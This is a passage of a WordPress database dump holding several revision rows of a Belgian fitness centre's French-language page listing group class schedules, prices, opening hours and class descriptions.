18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:53:34', '2013-07-03 15:53:34', '', 11, 'http://www.crosstrainingcenter.be/?p=157', 0, 'revision', '', 0),
(158, 1, '2013-07-03 15:54:03', '2013-07-03 15:54:03', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:54:03', '2013-07-03 15:54:03', '', 11, 'http://www.crosstrainingcenter.be/?p=158', 0, 'revision', '', 0),
(161, 1, '2013-07-03 16:09:17', '2013-07-03 16:09:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"objectif\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:09:17', '2013-07-03 16:09:17', '', 11, 'http://www.crosstrainingcenter.be/?p=161', 0, 'revision', '', 0),
(159, 1, '2013-07-03 15:55:25', '2013-07-03 15:55:25', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"objectif\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:55:25', '2013-07-03 15:55:25', '', 11, 'http://www.crosstrainingcenter.be/?p=159', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
